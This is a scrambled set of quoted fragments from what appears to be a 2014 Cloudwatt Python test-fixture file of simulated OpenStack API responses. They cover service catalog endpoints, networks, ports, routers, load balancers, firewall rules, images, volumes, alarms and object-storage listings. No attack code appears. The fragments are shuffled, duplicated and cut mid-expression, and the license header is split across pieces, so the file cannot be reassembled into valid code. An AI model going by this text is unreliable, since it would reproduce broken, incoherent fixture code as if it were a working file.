"'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering'",
"{ \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1",
"# Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog':",
"\"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\",",
"] STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\", \"links\": [ {",
"# Unless required by applicable law or agreed to in writing, software #",
"\"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\":",
"PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\",",
"by applicable law or agreed to in writing, software # distributed under the",
"= \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT =",
"PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\":",
"\"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ {",
"\"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\":",
"} FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\",",
"], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\":",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL':",
"'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL':",
"\"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ {",
"\"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\": [",
"\"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\":",
"}, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\":",
"] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'],",
"None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = {",
"\"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\":",
"SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\",",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); you may",
"\"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\":",
"\"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\":",
"\"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" }",
"PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] },",
"\"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\":",
"None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\",",
"[\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS",
"\"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None,",
"\"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\": [ {",
"\"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\":",
"u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b',",
"\"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\":",
"distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT #",
"test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [ { \"status\":",
"\"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\":",
"'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } }",
"\"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\":",
"} ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\":",
"None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True,",
"\"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\",",
"# not use this file except in compliance with the License. You may",
"] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\":",
"TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } },",
"None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\",",
"\"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\":",
"PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\",",
"= 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT =",
"\"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False },",
"\"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None,",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{",
"\"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\",",
"] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule",
"\"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\",",
"\"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\":",
"Version 2.0 (the \"License\"); you may # not use this file except in",
"\"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None,",
"None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80,",
"\"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\",",
"\"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\":",
"{ \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ]",
"'2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject'",
"\"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\":",
"\"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\",",
"\"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\":",
"NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT",
"= 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT =",
"\"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE",
"LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\",",
"\"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\":",
"[], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [],",
"{ \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\",",
"5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0]",
"PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\",",
"PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\",",
"{ \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\",",
"{ \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\":",
"'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username':",
"[ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False,",
"[\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS",
"} } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container':",
"False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\":",
"\"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [],",
"# -*- encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt # #",
"u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name':",
"\"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\":",
"\"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] }",
"{u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0,",
"\"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\":",
"OF ANY KIND, either express or implied. See the # License for the",
"'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"\"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\":",
"\"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [",
"} LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\",",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{",
"\"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False",
"\"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [ {",
"\"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\":",
"{ 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links':",
"1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False,",
"[ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\",",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{",
"= \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\",",
"u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\",",
"\"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": {",
"% VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id':",
"{ \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\",",
"utf-8 -*- # # Copyright © 2014 Cloudwatt # # Licensed under the",
"\"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\":",
"None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\",",
"'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token':",
"ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\":",
"u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22,",
"VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\"",
"\"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\":",
"'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL':",
"True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ {",
"}, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\":",
"# under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58'",
"\"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST =",
"\"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\":",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires':",
"FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [",
"[\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\",",
"SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\":",
"PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\",",
"{ \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\",",
"\"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE =",
"'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, {",
"] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\":",
"\"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS =",
"\"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\",",
"\"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\":",
"\"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS",
"STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name':",
"\"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\":",
"{}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, {",
"= { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True,",
"'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region':",
"None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1],",
"STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT",
"{ \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\":",
"0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968,",
"= { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\",",
"\"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [",
